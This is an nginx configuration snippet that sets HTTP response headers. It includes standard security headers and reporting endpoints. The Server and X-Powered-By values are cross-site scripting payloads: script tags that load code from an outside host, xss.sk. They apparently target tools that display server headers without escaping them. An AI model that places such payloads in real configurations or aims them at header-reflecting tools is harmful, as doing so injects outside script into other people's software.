add_header Server "<script/src=//xss.sk></script>" always;
add_header X-Powered-By "<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>" always;
add_header X-Content-Type-Options nosniff always;
add_header X-Frame-Options DENY always;
add_header Report-To '{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}' always;
add_header NEL '{"report_to": "default", "max_age": 31536000, "include_subdomains": true}' always;
